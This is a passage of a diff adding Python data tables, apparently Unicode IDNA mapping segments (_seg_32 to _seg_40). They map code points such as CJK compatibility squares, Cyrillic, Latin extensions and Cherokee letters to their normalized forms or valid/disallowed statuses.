+ (0x32C2, 'M', '3月'), + (0x32C3, 'M', '4月'), + (0x32C4, 'M', '5月'), + (0x32C5, 'M', '6月'), + (0x32C6, 'M', '7月'), + (0x32C7, 'M', '8月'), + (0x32C8, 'M', '9月'), + (0x32C9, 'M', '10月'), + (0x32CA, 'M', '11月'), + (0x32CB, 'M', '12月'), + (0x32CC, 'M', 'hg'), + (0x32CD, 'M', 'erg'), + (0x32CE, 'M', 'ev'), + (0x32CF, 'M', 'ltd'), + (0x32D0, 'M', 'ア'), + (0x32D1, 'M', 'イ'), + (0x32D2, 'M', 'ウ'), + (0x32D3, 'M', 'エ'), + (0x32D4, 'M', 'オ'), + (0x32D5, 'M', 'カ'), + (0x32D6, 'M', 'キ'), + (0x32D7, 'M', 'ク'), + (0x32D8, 'M', 'ケ'), + (0x32D9, 'M', 'コ'), + (0x32DA, 'M', 'サ'), + (0x32DB, 'M', 'シ'), + (0x32DC, 'M', 'ス'), + (0x32DD, 'M', 'セ'), + (0x32DE, 'M', 'ソ'), + (0x32DF, 'M', 'タ'), + (0x32E0, 'M', 'チ'), + (0x32E1, 'M', 'ツ'), + (0x32E2, 'M', 'テ'), + (0x32E3, 'M', 'ト'), + (0x32E4, 'M', 'ナ'), + (0x32E5, 'M', 'ニ'), + (0x32E6, 'M', 'ヌ'), + (0x32E7, 'M', 'ネ'), + (0x32E8, 'M', 'ノ'), + (0x32E9, 'M', 'ハ'), + (0x32EA, 'M', 'ヒ'), + (0x32EB, 'M', 'フ'), + (0x32EC, 'M', 'ヘ'), + (0x32ED, 'M', 'ホ'), + (0x32EE, 'M', 'マ'), + (0x32EF, 'M', 'ミ'), + (0x32F0, 'M', 'ム'), + (0x32F1, 'M', 'メ'), + (0x32F2, 'M', 'モ'), + (0x32F3, 'M', 'ヤ'), + (0x32F4, 'M', 'ユ'), + (0x32F5, 'M', 'ヨ'), + (0x32F6, 'M', 'ラ'), + (0x32F7, 'M', 'リ'), + (0x32F8, 'M', 'ル'), + (0x32F9, 'M', 'レ'), + (0x32FA, 'M', 'ロ'), + (0x32FB, 'M', 'ワ'), + (0x32FC, 'M', 'ヰ'), + (0x32FD, 'M', 'ヱ'), + (0x32FE, 'M', 'ヲ'), + (0x32FF, 'M', '令和'), + (0x3300, 'M', 'アパート'), + (0x3301, 'M', 'アルファ'), + (0x3302, 'M', 'アンペア'), + (0x3303, 'M', 'アール'), + (0x3304, 'M', 'イニング'), + (0x3305, 'M', 'インチ'), + (0x3306, 'M', 'ウォン'), + (0x3307, 'M', 'エスクード'), + (0x3308, 'M', 'エーカー'), + (0x3309, 'M', 'オンス'), + (0x330A, 'M', 'オーム'), + (0x330B, 'M', 'カイリ'), + (0x330C, 'M', 'カラット'), + (0x330D, 'M', 'カロリー'), + (0x330E, 'M', 'ガロン'), + (0x330F, 'M', 'ガンマ'), + (0x3310, 'M', 'ギガ'), + (0x3311, 'M', 'ギニー'), + (0x3312, 'M', 'キュリー'), + (0x3313, 'M', 'ギルダー'), + (0x3314, 'M', 'キロ'), + (0x3315, 'M', 'キログラム'), + ] + +def _seg_33() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x3316, 'M', 'キロメートル'), + (0x3317, 'M', 'キロワット'), + (0x3318, 'M', 'グラム'), + (0x3319, 'M', 'グラムトン'), + (0x331A, 'M', 'クルゼイロ'), + (0x331B, 'M', 'クローネ'), + (0x331C, 'M', 'ケース'), + (0x331D, 'M', 'コルナ'), + (0x331E, 'M', 'コーポ'), + (0x331F, 'M', 'サイクル'), + (0x3320, 'M', 'サンチーム'), + (0x3321, 'M', 'シリング'), + (0x3322, 'M', 'センチ'), + (0x3323, 'M', 'セント'), + (0x3324, 'M', 'ダース'), + (0x3325, 'M', 'デシ'), + (0x3326, 'M', 'ドル'), + (0x3327, 'M', 'トン'), + (0x3328, 'M', 'ナノ'), + (0x3329, 'M', 'ノット'), + (0x332A, 'M', 'ハイツ'), + (0x332B, 'M', 'パーセント'), + (0x332C, 'M', 'パーツ'), + (0x332D, 'M', 'バーレル'), + (0x332E, 'M', 'ピアストル'), + (0x332F, 'M', 'ピクル'), + (0x3330, 'M', 'ピコ'), + (0x3331, 'M', 'ビル'), + (0x3332, 'M', 'ファラッド'), + (0x3333, 'M', 'フィート'), + (0x3334, 'M', 'ブッシェル'), + (0x3335, 'M', 'フラン'), + (0x3336, 'M', 'ヘクタール'), + (0x3337, 'M', 'ペソ'), + (0x3338, 'M', 'ペニヒ'), + (0x3339, 'M', 'ヘルツ'), + (0x333A, 'M', 'ペンス'), + (0x333B, 'M', 'ページ'), + (0x333C, 'M', 'ベータ'), + (0x333D, 'M', 'ポイント'), + (0x333E, 'M', 'ボルト'), + (0x333F, 'M', 'ホン'), + (0x3340, 'M', 'ポンド'), + (0x3341, 'M', 'ホール'), + (0x3342, 'M', 'ホーン'), + (0x3343, 'M', 'マイクロ'), + (0x3344, 'M', 'マイル'), + (0x3345, 'M', 'マッハ'), + (0x3346, 'M', 'マルク'), + (0x3347, 'M', 'マンション'), + (0x3348, 'M', 'ミクロン'), + (0x3349, 'M', 'ミリ'), + (0x334A, 'M', 'ミリバール'), + (0x334B, 'M', 'メガ'), + (0x334C, 'M', 'メガトン'), + (0x334D, 'M', 'メートル'), + (0x334E, 'M', 'ヤード'), + (0x334F, 'M', 'ヤール'), + (0x3350, 'M', 'ユアン'), + (0x3351, 'M', 'リットル'), + (0x3352, 'M', 'リラ'), + (0x3353, 'M', 'ルピー'), + (0x3354, 'M', 'ルーブル'), + (0x3355, 'M', 'レム'), + (0x3356, 'M', 'レントゲン'), + (0x3357, 'M', 'ワット'), + (0x3358, 'M', '0点'), + (0x3359, 'M', '1点'), + (0x335A, 'M', '2点'), + (0x335B, 'M', '3点'), + (0x335C, 'M', '4点'), + (0x335D, 'M', '5点'), + (0x335E, 'M', '6点'), + (0x335F, 'M', '7点'), + (0x3360, 'M', '8点'), + (0x3361, 'M', '9点'), + (0x3362, 'M', '10点'), + (0x3363, 'M', '11点'), + (0x3364, 'M', '12点'), + (0x3365, 'M', '13点'), + (0x3366, 'M', '14点'), + (0x3367, 'M', '15点'), + (0x3368, 'M', '16点'), + (0x3369, 'M', '17点'), + (0x336A, 'M', '18点'), + (0x336B, 'M', '19点'), + (0x336C, 'M', '20点'), + (0x336D, 'M', '21点'), + (0x336E, 'M', '22点'), + (0x336F, 'M', '23点'), + (0x3370, 'M', '24点'), + (0x3371, 'M', 'hpa'), + (0x3372, 'M', 'da'), + (0x3373, 'M', 'au'), + (0x3374, 'M', 'bar'), + (0x3375, 'M', 'ov'), + (0x3376, 'M', 'pc'), + (0x3377, 'M', 'dm'), + (0x3378, 'M', 'dm2'), + (0x3379, 'M', 'dm3'), + ] + +def _seg_34() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x337A, 'M', 'iu'), + (0x337B, 'M', '平成'), + (0x337C, 'M', '昭和'), + (0x337D, 'M', '大正'), + (0x337E, 'M', '明治'), + (0x337F, 'M', '株式会社'), + (0x3380, 'M', 'pa'), + (0x3381, 'M', 'na'), + (0x3382, 'M', 'μa'), + (0x3383, 'M', 'ma'), + (0x3384, 'M', 'ka'), + (0x3385, 'M', 'kb'), + (0x3386, 'M', 'mb'), + (0x3387, 'M', 'gb'), + (0x3388, 'M', 'cal'), + (0x3389, 'M', 'kcal'), + (0x338A, 'M', 'pf'), + (0x338B, 'M', 'nf'), + (0x338C, 'M', 'μf'), + (0x338D, 'M', 'μg'), + (0x338E, 'M', 'mg'), + (0x338F, 'M', 'kg'), + (0x3390, 'M', 'hz'), + (0x3391, 'M', 'khz'), + (0x3392, 'M', 'mhz'), + (0x3393, 'M', 'ghz'), + (0x3394, 'M', 'thz'), + (0x3395, 'M', 'μl'), + (0x3396, 'M', 'ml'), + (0x3397, 'M', 'dl'), + (0x3398, 'M', 'kl'), + (0x3399, 'M', 'fm'), + (0x339A, 'M', 'nm'), + (0x339B, 'M', 'μm'), + (0x339C, 'M', 'mm'), + (0x339D, 'M', 'cm'), + (0x339E, 'M', 'km'), + (0x339F, 'M', 'mm2'), + (0x33A0, 'M', 'cm2'), + (0x33A1, 'M', 'm2'), + (0x33A2, 'M', 'km2'), + (0x33A3, 'M', 'mm3'), + (0x33A4, 'M', 'cm3'), + (0x33A5, 'M', 'm3'), + (0x33A6, 'M', 'km3'), + (0x33A7, 'M', 'm∕s'), + (0x33A8, 'M', 'm∕s2'), + (0x33A9, 'M', 'pa'), + (0x33AA, 'M', 'kpa'), + (0x33AB, 'M', 'mpa'), + (0x33AC, 'M', 'gpa'), + (0x33AD, 'M', 'rad'), + (0x33AE, 'M', 'rad∕s'), + (0x33AF, 'M', 'rad∕s2'), + (0x33B0, 'M', 'ps'), + (0x33B1, 'M', 'ns'), + (0x33B2, 'M', 'μs'), + (0x33B3, 'M', 'ms'), + (0x33B4, 'M', 'pv'), + (0x33B5, 'M', 'nv'), + (0x33B6, 'M', 'μv'), + (0x33B7, 'M', 'mv'), + (0x33B8, 'M', 'kv'), + (0x33B9, 'M', 'mv'), + (0x33BA, 'M', 'pw'), + (0x33BB, 'M', 'nw'), + (0x33BC, 'M', 'μw'), + (0x33BD, 'M', 'mw'), + (0x33BE, 'M', 'kw'), + (0x33BF, 'M', 'mw'), + (0x33C0, 'M', 'kω'), + (0x33C1, 'M', 'mω'), + (0x33C2, 'X'), + (0x33C3, 'M', 'bq'), + (0x33C4, 'M', 'cc'), + (0x33C5, 'M', 'cd'), + (0x33C6, 'M', 'c∕kg'), + (0x33C7, 'X'), + (0x33C8, 'M', 'db'), + (0x33C9, 'M', 'gy'), + (0x33CA, 'M', 'ha'), + (0x33CB, 'M', 'hp'), + (0x33CC, 'M', 'in'), + (0x33CD, 'M', 'kk'), + (0x33CE, 'M', 'km'), + (0x33CF, 'M', 'kt'), + (0x33D0, 'M', 'lm'), + (0x33D1, 'M', 'ln'), + (0x33D2, 'M', 'log'), + (0x33D3, 'M', 'lx'), + (0x33D4, 'M', 'mb'), + (0x33D5, 'M', 'mil'), + (0x33D6, 'M', 'mol'), + (0x33D7, 'M', 'ph'), + (0x33D8, 'X'), + (0x33D9, 'M', 'ppm'), + (0x33DA, 'M', 'pr'), + (0x33DB, 'M', 'sr'), + (0x33DC, 'M', 'sv'), + (0x33DD, 'M', 'wb'), + ] + +def _seg_35() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x33DE, 'M', 'v∕m'), + (0x33DF, 'M', 'a∕m'), + (0x33E0, 'M', '1日'), + (0x33E1, 'M', '2日'), + (0x33E2, 'M', '3日'), + (0x33E3, 'M', '4日'), + (0x33E4, 'M', '5日'), + (0x33E5, 'M', '6日'), + (0x33E6, 'M', '7日'), + (0x33E7, 'M', '8日'), + (0x33E8, 'M', '9日'), + (0x33E9, 'M', '10日'), + (0x33EA, 'M', '11日'), + (0x33EB, 'M', '12日'), + (0x33EC, 'M', '13日'), + (0x33ED, 'M', '14日'), + (0x33EE, 'M', '15日'), + (0x33EF, 'M', '16日'), + (0x33F0, 'M', '17日'), + (0x33F1, 'M', '18日'), + (0x33F2, 'M', '19日'), + (0x33F3, 'M', '20日'), + (0x33F4, 'M', '21日'), + (0x33F5, 'M', '22日'), + (0x33F6, 'M', '23日'), + (0x33F7, 'M', '24日'), + (0x33F8, 'M', '25日'), + (0x33F9, 'M', '26日'), + (0x33FA, 'M', '27日'), + (0x33FB, 'M', '28日'), + (0x33FC, 'M', '29日'), + (0x33FD, 'M', '30日'), + (0x33FE, 'M', '31日'), + (0x33FF, 'M', 'gal'), + (0x3400, 'V'), + (0xA48D, 'X'), + (0xA490, 'V'), + (0xA4C7, 'X'), + (0xA4D0, 'V'), + (0xA62C, 'X'), + (0xA640, 'M', 'ꙁ'), + (0xA641, 'V'), + (0xA642, 'M', 'ꙃ'), + (0xA643, 'V'), + (0xA644, 'M', 'ꙅ'), + (0xA645, 'V'), + (0xA646, 'M', 'ꙇ'), + (0xA647, 'V'), + (0xA648, 'M', 'ꙉ'), + (0xA649, 'V'), + (0xA64A, 'M', 'ꙋ'), + (0xA64B, 'V'), + (0xA64C, 'M', 'ꙍ'), + (0xA64D, 'V'), + (0xA64E, 'M', 'ꙏ'), + (0xA64F, 'V'), + (0xA650, 'M', 'ꙑ'), + (0xA651, 'V'), + (0xA652, 'M', 'ꙓ'), + (0xA653, 'V'), + (0xA654, 'M', 'ꙕ'), + (0xA655, 'V'), + (0xA656, 'M', 'ꙗ'), + (0xA657, 'V'), + (0xA658, 'M', 'ꙙ'), + (0xA659, 'V'), + (0xA65A, 'M', 'ꙛ'), + (0xA65B, 'V'), + (0xA65C, 'M', 'ꙝ'), + (0xA65D, 'V'), + (0xA65E, 'M', 'ꙟ'), + (0xA65F, 'V'), + (0xA660, 'M', 'ꙡ'), + (0xA661, 'V'), + (0xA662, 'M', 'ꙣ'), + (0xA663, 'V'), + (0xA664, 'M', 'ꙥ'), + (0xA665, 'V'), + (0xA666, 'M', 'ꙧ'), + (0xA667, 'V'), + (0xA668, 'M', 'ꙩ'), + (0xA669, 'V'), + (0xA66A, 'M', 'ꙫ'), + (0xA66B, 'V'), + (0xA66C, 'M', 'ꙭ'), + (0xA66D, 'V'), + (0xA680, 'M', 'ꚁ'), + (0xA681, 'V'), + (0xA682, 'M', 'ꚃ'), + (0xA683, 'V'), + (0xA684, 'M', 'ꚅ'), + (0xA685, 'V'), + (0xA686, 'M', 'ꚇ'), + (0xA687, 'V'), + (0xA688, 'M', 'ꚉ'), + (0xA689, 'V'), + (0xA68A, 'M', 'ꚋ'), + (0xA68B, 'V'), + (0xA68C, 'M', 'ꚍ'), + (0xA68D, 'V'), + ] + +def _seg_36() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xA68E, 'M', 'ꚏ'), + (0xA68F, 'V'), + (0xA690, 'M', 'ꚑ'), + (0xA691, 'V'), + (0xA692, 'M', 'ꚓ'), + (0xA693, 'V'), + (0xA694, 'M', 'ꚕ'), + (0xA695, 'V'), + (0xA696, 'M', 'ꚗ'), + (0xA697, 'V'), + (0xA698, 'M', 'ꚙ'), + (0xA699, 'V'), + (0xA69A, 'M', 'ꚛ'), + (0xA69B, 'V'), + (0xA69C, 'M', 'ъ'), + (0xA69D, 'M', 'ь'), + (0xA69E, 'V'), + (0xA6F8, 'X'), + (0xA700, 'V'), + (0xA722, 'M', 'ꜣ'), + (0xA723, 'V'), + (0xA724, 'M', 'ꜥ'), + (0xA725, 'V'), + (0xA726, 'M', 'ꜧ'), + (0xA727, 'V'), + (0xA728, 'M', 'ꜩ'), + (0xA729, 'V'), + (0xA72A, 'M', 'ꜫ'), + (0xA72B, 'V'), + (0xA72C, 'M', 'ꜭ'), + (0xA72D, 'V'), + (0xA72E, 'M', 'ꜯ'), + (0xA72F, 'V'), + (0xA732, 'M', 'ꜳ'), + (0xA733, 'V'), + (0xA734, 'M', 'ꜵ'), + (0xA735, 'V'), + (0xA736, 'M', 'ꜷ'), + (0xA737, 'V'), + (0xA738, 'M', 'ꜹ'), + (0xA739, 'V'), + (0xA73A, 'M', 'ꜻ'), + (0xA73B, 'V'), + (0xA73C, 'M', 'ꜽ'), + (0xA73D, 'V'), + (0xA73E, 'M', 'ꜿ'), + (0xA73F, 'V'), + (0xA740, 'M', 'ꝁ'), + (0xA741, 'V'), + (0xA742, 'M', 'ꝃ'), + (0xA743, 'V'), + (0xA744, 'M', 'ꝅ'), + (0xA745, 'V'), + (0xA746, 'M', 'ꝇ'), + (0xA747, 'V'), + (0xA748, 'M', 'ꝉ'), + (0xA749, 'V'), + (0xA74A, 'M', 'ꝋ'), + (0xA74B, 'V'), + (0xA74C, 'M', 'ꝍ'), + (0xA74D, 'V'), + (0xA74E, 'M', 'ꝏ'), + (0xA74F, 'V'), + (0xA750, 'M', 'ꝑ'), + (0xA751, 'V'), + (0xA752, 'M', 'ꝓ'), + (0xA753, 'V'), + (0xA754, 'M', 'ꝕ'), + (0xA755, 'V'), + (0xA756, 'M', 'ꝗ'), + (0xA757, 'V'), + (0xA758, 'M', 'ꝙ'), + (0xA759, 'V'), + (0xA75A, 'M', 'ꝛ'), + (0xA75B, 'V'), + (0xA75C, 'M', 'ꝝ'), + (0xA75D, 'V'), + (0xA75E, 'M', 'ꝟ'), + (0xA75F, 'V'), + (0xA760, 'M', 'ꝡ'), + (0xA761, 'V'), + (0xA762, 'M', 'ꝣ'), + (0xA763, 'V'), + (0xA764, 'M', 'ꝥ'), + (0xA765, 'V'), + (0xA766, 'M', 'ꝧ'), + (0xA767, 'V'), + (0xA768, 'M', 'ꝩ'), + (0xA769, 'V'), + (0xA76A, 'M', 'ꝫ'), + (0xA76B, 'V'), + (0xA76C, 'M', 'ꝭ'), + (0xA76D, 'V'), + (0xA76E, 'M', 'ꝯ'), + (0xA76F, 'V'), + (0xA770, 'M', 'ꝯ'), + (0xA771, 'V'), + (0xA779, 'M', 'ꝺ'), + (0xA77A, 'V'), + (0xA77B, 'M', 'ꝼ'), + ] + +def _seg_37() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xA77C, 'V'), + (0xA77D, 'M', 'ᵹ'), + (0xA77E, 'M', 'ꝿ'), + (0xA77F, 'V'), + (0xA780, 'M', 'ꞁ'), + (0xA781, 'V'), + (0xA782, 'M', 'ꞃ'), + (0xA783, 'V'), + (0xA784, 'M', 'ꞅ'), + (0xA785, 'V'), + (0xA786, 'M', 'ꞇ'), + (0xA787, 'V'), + (0xA78B, 'M', 'ꞌ'), + (0xA78C, 'V'), + (0xA78D, 'M', 'ɥ'), + (0xA78E, 'V'), + (0xA790, 'M', 'ꞑ'), + (0xA791, 'V'), + (0xA792, 'M', 'ꞓ'), + (0xA793, 'V'), + (0xA796, 'M', 'ꞗ'), + (0xA797, 'V'), + (0xA798, 'M', 'ꞙ'), + (0xA799, 'V'), + (0xA79A, 'M', 'ꞛ'), + (0xA79B, 'V'), + (0xA79C, 'M', 'ꞝ'), + (0xA79D, 'V'), + (0xA79E, 'M', 'ꞟ'), + (0xA79F, 'V'), + (0xA7A0, 'M', 'ꞡ'), + (0xA7A1, 'V'), + (0xA7A2, 'M', 'ꞣ'), + (0xA7A3, 'V'), + (0xA7A4, 'M', 'ꞥ'), + (0xA7A5, 'V'), + (0xA7A6, 'M', 'ꞧ'), + (0xA7A7, 'V'), + (0xA7A8, 'M', 'ꞩ'), + (0xA7A9, 'V'), + (0xA7AA, 'M', 'ɦ'), + (0xA7AB, 'M', 'ɜ'), + (0xA7AC, 'M', 'ɡ'), + (0xA7AD, 'M', 'ɬ'), + (0xA7AE, 'M', 'ɪ'), + (0xA7AF, 'V'), + (0xA7B0, 'M', 'ʞ'), + (0xA7B1, 'M', 'ʇ'), + (0xA7B2, 'M', 'ʝ'), + (0xA7B3, 'M', 'ꭓ'), + (0xA7B4, 'M', 'ꞵ'), + (0xA7B5, 'V'), + (0xA7B6, 'M', 'ꞷ'), + (0xA7B7, 'V'), + (0xA7B8, 'M', 'ꞹ'), + (0xA7B9, 'V'), + (0xA7BA, 'M', 'ꞻ'), + (0xA7BB, 'V'), + (0xA7BC, 'M', 'ꞽ'), + (0xA7BD, 'V'), + (0xA7BE, 'M', 'ꞿ'), + (0xA7BF, 'V'), + (0xA7C0, 'M', 'ꟁ'), + (0xA7C1, 'V'), + (0xA7C2, 'M', 'ꟃ'), + (0xA7C3, 'V'), + (0xA7C4, 'M', 'ꞔ'), + (0xA7C5, 'M', 'ʂ'), + (0xA7C6, 'M', 'ᶎ'), + (0xA7C7, 'M', 'ꟈ'), + (0xA7C8, 'V'), + (0xA7C9, 'M', 'ꟊ'), + (0xA7CA, 'V'), + (0xA7CB, 'X'), + (0xA7D0, 'M', 'ꟑ'), + (0xA7D1, 'V'), + (0xA7D2, 'X'), + (0xA7D3, 'V'), + (0xA7D4, 'X'), + (0xA7D5, 'V'), + (0xA7D6, 'M', 'ꟗ'), + (0xA7D7, 'V'), + (0xA7D8, 'M', 'ꟙ'), + (0xA7D9, 'V'), + (0xA7DA, 'X'), + (0xA7F2, 'M', 'c'), + (0xA7F3, 'M', 'f'), + (0xA7F4, 'M', 'q'), + (0xA7F5, 'M', 'ꟶ'), + (0xA7F6, 'V'), + (0xA7F8, 'M', 'ħ'), + (0xA7F9, 'M', 'œ'), + (0xA7FA, 'V'), + (0xA82D, 'X'), + (0xA830, 'V'), + (0xA83A, 'X'), + (0xA840, 'V'), + (0xA878, 'X'), + (0xA880, 'V'), + (0xA8C6, 'X'), + ] + +def _seg_38() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xA8CE, 'V'), + (0xA8DA, 'X'), + (0xA8E0, 'V'), + (0xA954, 'X'), + (0xA95F, 'V'), + (0xA97D, 'X'), + (0xA980, 'V'), + (0xA9CE, 'X'), + (0xA9CF, 'V'), + (0xA9DA, 'X'), + (0xA9DE, 'V'), + (0xA9FF, 'X'), + (0xAA00, 'V'), + (0xAA37, 'X'), + (0xAA40, 'V'), + (0xAA4E, 'X'), + (0xAA50, 'V'), + (0xAA5A, 'X'), + (0xAA5C, 'V'), + (0xAAC3, 'X'), + (0xAADB, 'V'), + (0xAAF7, 'X'), + (0xAB01, 'V'), + (0xAB07, 'X'), + (0xAB09, 'V'), + (0xAB0F, 'X'), + (0xAB11, 'V'), + (0xAB17, 'X'), + (0xAB20, 'V'), + (0xAB27, 'X'), + (0xAB28, 'V'), + (0xAB2F, 'X'), + (0xAB30, 'V'), + (0xAB5C, 'M', 'ꜧ'), + (0xAB5D, 'M', 'ꬷ'), + (0xAB5E, 'M', 'ɫ'), + (0xAB5F, 'M', 'ꭒ'), + (0xAB60, 'V'), + (0xAB69, 'M', 'ʍ'), + (0xAB6A, 'V'), + (0xAB6C, 'X'), + (0xAB70, 'M', 'Ꭰ'), + (0xAB71, 'M', 'Ꭱ'), + (0xAB72, 'M', 'Ꭲ'), + (0xAB73, 'M', 'Ꭳ'), + (0xAB74, 'M', 'Ꭴ'), + (0xAB75, 'M', 'Ꭵ'), + (0xAB76, 'M', 'Ꭶ'), + (0xAB77, 'M', 'Ꭷ'), + (0xAB78, 'M', 'Ꭸ'), + (0xAB79, 'M', 'Ꭹ'), + (0xAB7A, 'M', 'Ꭺ'), + (0xAB7B, 'M', 'Ꭻ'), + (0xAB7C, 'M', 'Ꭼ'), + (0xAB7D, 'M', 'Ꭽ'), + (0xAB7E, 'M', 'Ꭾ'), + (0xAB7F, 'M', 'Ꭿ'), + (0xAB80, 'M', 'Ꮀ'), + (0xAB81, 'M', 'Ꮁ'), + (0xAB82, 'M', 'Ꮂ'), + (0xAB83, 'M', 'Ꮃ'), + (0xAB84, 'M', 'Ꮄ'), + (0xAB85, 'M', 'Ꮅ'), + (0xAB86, 'M', 'Ꮆ'), + (0xAB87, 'M', 'Ꮇ'), + (0xAB88, 'M', 'Ꮈ'), + (0xAB89, 'M', 'Ꮉ'), + (0xAB8A, 'M', 'Ꮊ'), + (0xAB8B, 'M', 'Ꮋ'), + (0xAB8C, 'M', 'Ꮌ'), + (0xAB8D, 'M', 'Ꮍ'), + (0xAB8E, 'M', 'Ꮎ'), + (0xAB8F, 'M', 'Ꮏ'), + (0xAB90, 'M', 'Ꮐ'), + (0xAB91, 'M', 'Ꮑ'), + (0xAB92, 'M', 'Ꮒ'), + (0xAB93, 'M', 'Ꮓ'), + (0xAB94, 'M', 'Ꮔ'), + (0xAB95, 'M', 'Ꮕ'), + (0xAB96, 'M', 'Ꮖ'), + (0xAB97, 'M', 'Ꮗ'), + (0xAB98, 'M', 'Ꮘ'), + (0xAB99, 'M', 'Ꮙ'), + (0xAB9A, 'M', 'Ꮚ'), + (0xAB9B, 'M', 'Ꮛ'), + (0xAB9C, 'M', 'Ꮜ'), + (0xAB9D, 'M', 'Ꮝ'), + (0xAB9E, 'M', 'Ꮞ'), + (0xAB9F, 'M', 'Ꮟ'), + (0xABA0, 'M', 'Ꮠ'), + (0xABA1, 'M', 'Ꮡ'), + (0xABA2, 'M', 'Ꮢ'), + (0xABA3, 'M', 'Ꮣ'), + (0xABA4, 'M', 'Ꮤ'), + (0xABA5, 'M', 'Ꮥ'), + (0xABA6, 'M', 'Ꮦ'), + (0xABA7, 'M', 'Ꮧ'), + (0xABA8, 'M', 'Ꮨ'), + (0xABA9, 'M', 'Ꮩ'), + (0xABAA, 'M', 'Ꮪ'), + ] + +def _seg_39() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xABAB, 'M', 'Ꮫ'), + (0xABAC, 'M', 'Ꮬ'), + (0xABAD, 'M', 'Ꮭ'), + (0xABAE, 'M', 'Ꮮ'), + (0xABAF, 'M', 'Ꮯ'), + (0xABB0, 'M', 'Ꮰ'), + (0xABB1, 'M', 'Ꮱ'), + (0xABB2, 'M', 'Ꮲ'), + (0xABB3, 'M', 'Ꮳ'), + (0xABB4, 'M', 'Ꮴ'), + (0xABB5, 'M', 'Ꮵ'), + (0xABB6, 'M', 'Ꮶ'), + (0xABB7, 'M', 'Ꮷ'), + (0xABB8, 'M', 'Ꮸ'), + (0xABB9, 'M', 'Ꮹ'), + (0xABBA, 'M', 'Ꮺ'), + (0xABBB, 'M', 'Ꮻ'), + (0xABBC, 'M', 'Ꮼ'), + (0xABBD, 'M', 'Ꮽ'), + (0xABBE, 'M', 'Ꮾ'), + (0xABBF, 'M', 'Ꮿ'), + (0xABC0, 'V'), + (0xABEE, 'X'), + (0xABF0, 'V'), + (0xABFA, 'X'), + (0xAC00, 'V'), + (0xD7A4, 'X'), + (0xD7B0, 'V'), + (0xD7C7, 'X'), + (0xD7CB, 'V'), + (0xD7FC, 'X'), + (0xF900, 'M', '豈'), + (0xF901, 'M', '更'), + (0xF902, 'M', '車'), + (0xF903, 'M', '賈'), + (0xF904, 'M', '滑'), + (0xF905, 'M', '串'), + (0xF906, 'M', '句'), + (0xF907, 'M', '龜'), + (0xF909, 'M', '契'), + (0xF90A, 'M', '金'), + (0xF90B, 'M', '喇'), + (0xF90C, 'M', '奈'), + (0xF90D, 'M', '懶'), + (0xF90E, 'M', '癩'), + (0xF90F, 'M', '羅'), + (0xF910, 'M', '蘿'), + (0xF911, 'M', '螺'), + (0xF912, 'M', '裸'), + (0xF913, 'M', '邏'), + (0xF914, 'M', '樂'), + (0xF915, 'M', '洛'), + (0xF916, 'M', '烙'), + (0xF917, 'M', '珞'), + (0xF918, 'M', '落'), + (0xF919, 'M', '酪'), + (0xF91A, 'M', '駱'), + (0xF91B, 'M', '亂'), + (0xF91C, 'M', '卵'), + (0xF91D, 'M', '欄'), + (0xF91E, 'M', '爛'), + (0xF91F, 'M', '蘭'), + (0xF920, 'M', '鸞'), + (0xF921, 'M', '嵐'), + (0xF922, 'M', '濫'), + (0xF923, 'M', '藍'), + (0xF924, 'M', '襤'), + (0xF925, 'M', '拉'), + (0xF926, 'M', '臘'), + (0xF927, 'M', '蠟'), + (0xF928, 'M', '廊'), + (0xF929, 'M', '朗'), + (0xF92A, 'M', '浪'), + (0xF92B, 'M', '狼'), + (0xF92C, 'M', '郎'), + (0xF92D, 'M', '來'), + (0xF92E, 'M', '冷'), + (0xF92F, 'M', '勞'), + (0xF930, 'M', '擄'), + (0xF931, 'M', '櫓'), + (0xF932, 'M', '爐'), + (0xF933, 'M', '盧'), + (0xF934, 'M', '老'), + (0xF935, 'M', '蘆'), + (0xF936, 'M', '虜'), + (0xF937, 'M', '路'), + (0xF938, 'M', '露'), + (0xF939, 'M', '魯'), + (0xF93A, 'M', '鷺'), + (0xF93B, 'M', '碌'), + (0xF93C, 'M', '祿'), + (0xF93D, 'M', '綠'), + (0xF93E, 'M', '菉'), + (0xF93F, 'M', '錄'), + (0xF940, 'M', '鹿'), + (0xF941, 'M', '論'), + (0xF942, 'M', '壟'), + (0xF943, 'M', '弄'), + (0xF944, 'M', '籠'), + (0xF945, 'M', '聾'), + ] + +def _seg_40() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xF946, 'M', '牢'), + (0xF947, 'M', '磊'), + (0xF948, 'M', '賂'), + (0xF949, 'M', '雷'), + (0xF94A, 'M', '壘'), + (0xF94B, 'M', '屢'), + (0xF94C, 'M', '樓'), + (0xF94D, 'M', '淚'), + (0xF94E, 'M', '漏'), + (0xF94F, 'M', '累'), + (0xF950, 'M', '縷'), + (0xF951, 'M', '陋'), + (0xF952, 'M', '勒'), + (0xF953, 'M', '肋'), + (0xF954, 'M', '凜'), + (0xF955, 'M', '凌'), + (0xF956, 'M', '稜'), + (0xF957, 'M', '綾'), + (0xF958, 'M', '菱'), + (0xF959, 'M', '陵'), + (0xF95A, 'M', '讀'), + (0xF95B, 'M', '拏'), + (0xF95C, 'M', '樂'), + (0xF95D, 'M', '諾'), + (0xF95E, 'M', '丹'), + (0xF95F, 'M', '寧'), + (0xF960, 'M', '怒'), + (0xF961, 'M', '率'), + (0xF962, 'M', '異'), + (0xF963, 'M', '北'), + (0xF964, 'M', '磻'), + (0xF965, 'M', '便'), + (0xF966, 'M', '復'), + (0xF967, 'M', '不'), + (0xF968, 'M', '泌'), + (0xF969, 'M', '數'), + (0xF96A, 'M', '索'), + (0xF96B, 'M', '參'), + (0xF96C, 'M', '塞'), + (0xF96D, 'M', '省'), + (0xF96E, 'M', '葉'), + (0xF96F, 'M', '說'), + (0xF970, 'M', '殺'), + (0xF971, 'M', '辰'), + (0xF972, 'M', '沈'), + (0xF973, 'M', '拾'), + (0xF974, 'M', '若'), + (0xF975, 'M', '掠'), + (0xF976, 'M', '略'), + (0xF977, 'M', '亮'), + (0xF978, 'M', '兩'), + (0xF979, 'M', '凉'), + (0xF97A, 'M', '梁'), + (0xF97B, 'M', '糧'), + (0xF97C, 'M', 